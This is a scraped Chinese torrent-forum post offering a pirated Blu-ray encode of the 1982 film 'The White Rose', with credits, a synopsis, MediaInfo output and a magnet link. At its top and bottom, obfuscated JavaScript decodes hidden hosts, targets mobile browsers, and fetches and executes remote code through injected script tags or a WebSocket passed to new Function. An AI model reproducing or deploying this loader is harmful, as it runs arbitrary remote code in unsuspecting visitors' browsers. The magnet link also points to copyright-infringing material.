白玫瑰[国语音轨/简繁字幕].The.White.Rose.1982.BluRay.1080p.2Audio.DTS-HD.MA.2.0.x265.10bit-bt9527.cc 10.56GB

版主小s 17天前 168

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 白玫瑰 / 白玫瑰在行动 / The White Rose

◎片 名 Die wei?e Rose

◎年 代 1982

◎产 地 西德

◎类 别 剧情 / 传记 / 历史 / 战争 / 犯罪

◎语 言 德语

◎上映日期 1982-09-24(西德)

◎IMDb链接 https://www.imdb.com/title/tt0084897/

◎豆瓣评分 7.6/10 (212人评价)

◎豆瓣链接 https://movie.douban.com/subject/1438616/

◎片 长 Germany: 123 分钟

◎导 演 米夏埃尔·费尔赫芬 Michael Verhoeven (id:1012647)

◎编 剧 米夏埃尔·费尔赫芬 Michael Verhoeven (id:1012647)

Mario Krebs Mario Krebs (id:1289007)

◎演 员 莱娜·施托尔策 Lena Stolze (id:1025508)

乌尔里希·图库尔 Ulrich Tukur (id:1025357)

Ulf-Jürgen Wagner Ulf-Jürgen Wagner (id:1164204)

Werner Stocker Werner Stocker (id:1159440)

Lis Verhoeven Lis Verhoeven (id:1150353)

Elemér Tarsoly Elemér Tarsoly (id:1149903)

Hans-Jürgen Schatz Hans-Jürgen Schatz (id:1141975)

Axel Scholtz Axel Scholtz (id:1140238)

Werner Schnitzer Werner Schnitzer (id:1139392)

克劳斯·芒斯特 Klaus Münster (id:1133582)

Joachim R. Iffland Joachim R. Iffland (id:1112519)

Helmut Alimonta Helmut Alimonta (id:1056991)

马丁·本拉特 Martin Benrath (id:1064449)

ágnes Csere ágnes Csere (id:1075860)

?马克斯·格里耶尔? Max Griesser (id:1092489)

J?rg Hube J?rg Hube (id:1094059)

Anja Kruse Anja Kruse (id:1110193)

Wilfried Klaus Wilfried Klaus (id:1110516)

童自荣 Zirong Tong (id:1318216)

森塔·贝格尔 Senta Berger (id:1048250)

米夏埃尔·费尔赫芬 Michael Verhoeven (id:1012647)

艾特·布奥尼 Artur Brauner (id:1022609)

Joschi Arpa Joschi Arpa (id:1039429)

康斯坦丁·威克 Konstantin Wecker (id:1020142)

芭芭拉·赫宁斯 Barbara Hennings (id:1286457)

◎标 签 德国 / 二战 / 德国电影 / 反法西斯 / 战争 / 历史 / 1982 / 自由

◎简 介

《白玫瑰在行动》讲述第二次世界大战期间,德国慕尼黑玛克西米利安大学的索菲等几名大学生,为了推翻法西斯统治和结束战争,建立了一个名为“白玫瑰”的抵抗组织。他们印刷、散发传单,号召德国人民起来反对纳粹,并开展种种破坏活动。渐渐的这支“白玫瑰”小组影响力扩大,得到了许多学生的支持,然而盖世太保是不会让这支“白玫瑰”继续绽放的。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 295748039676630492666414911576373424147 (0xDE7F0024BF1058001E60D4814E977013)

  4. Complete name : The.Whi[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 10.6 GiB

  8. Duration : 2 h 4 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 12.1 Mb/s

  11. Encoded date : UTC 2021-11-16 01:41:48

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 2 h 4 min

  21. Bit rate : 9 997 kb/s

  22. Width : 1 792 pixels

  23. Height : 1 080 pixels

  24. Display aspect ratio : 5:3

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.215

  31. Stream size : 8.72 GiB (83%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 9997 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1792x1080 / interlace=0 / total-frames=179537 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio #1

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 2 h 4 min

  49. Bit rate mode : Variable

  50. Bit rate : 1 421 kb/s

  51. Channel(s) : 2 channels

  52. Channel layout : L R

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 24 bits

  56. Compression mode : Lossless

  57. Stream size : 1.24 GiB (12%)

  58. Title : German DTS-HD Master Audio 2.0 @ 1421 kbps

  59. Language : German

  60. Default : Yes

  61. Forced : No


  62. Audio #2

  63. ID : 3

  64. Format : AC-3

  65. Format/Info : Audio Coding 3

  66. Commercial name : Dolby Digital

  67. Codec ID : A_AC3

  68. Duration : 2 h 4 min

  69. Bit rate mode : Constant

  70. Bit rate : 640 kb/s

  71. Channel(s) : 2 channels

  72. Channel layout : L R

  73. Sampling rate : 48.0 kHz

  74. Frame rate : 31.250 FPS (1536 SPF)

  75. Compression mode : Lossy

  76. Stream size : 571 MiB (5%)

  77. Title : Mandarin Dolby Digital Audio 2.0 @ 640 kbps 上译国配

  78. Language : Chinese

  79. Service kind : Complete Main

  80. Default : No

  81. Forced : No


  82. Text #1

  83. ID : 4

  84. Format : PGS

  85. Codec ID : S_HDMV/PGS

  86. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  87. Duration : 2 h 3 min

  88. Bit rate : 25.2 kb/s

  89. Count of elements : 2163

  90. Stream size : 22.4 MiB (0%)

  91. Title : Chs/SUP 简体

  92. Language : Chinese

  93. Default : Yes

  94. Forced : No


  95. Text #2

  96. ID : 5

  97. Format : PGS

  98. Codec ID : S_HDMV/PGS

  99. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  100. Duration : 2 h 3 min

  101. Bit rate : 26.6 kb/s

  102. Count of elements : 2163

  103. Stream size : 23.6 MiB (0%)

  104. Title : Cht/SUP 繁体

  105. Language : Chinese

  106. Default : No

  107. Forced : No


  108. Menu

  109. 00:00:00.000 : en:第 01 章

  110. 00:09:39.037 : en:第 02 章

  111. 00:20:17.091 : en:第 03 章

  112. 00:30:56.480 : en:第 04 章

  113. 00:40:10.950 : en:第 05 章

  114. 00:51:13.320 : en:第 06 章

  115. 00:59:46.208 : en:第 07 章

  116. 01:11:03.801 : en:第 08 章

  117. 01:21:15.037 : en:第 09 章

  118. 01:32:45.518 : en:第 10 章

  119. 01:41:59.905 : en:第 11 章

  120. 01:51:36.106 : en:第 12 章




复制代码


TAGS 剧情 犯罪 历史 传记 战争

磁力链:
  • magnet:?xt=urn:btih:5E0C283D3F3E25BEFE17E30BD53A31C42B089AE3

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};